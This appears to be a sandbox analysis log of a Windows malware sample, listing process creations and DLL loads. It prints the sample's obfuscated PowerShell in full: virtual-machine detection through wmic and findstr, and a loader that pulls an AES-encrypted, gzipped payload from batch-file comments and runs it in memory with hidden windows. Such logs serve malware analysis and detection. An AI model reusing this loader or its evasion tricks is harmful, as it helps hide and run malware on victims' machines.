Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
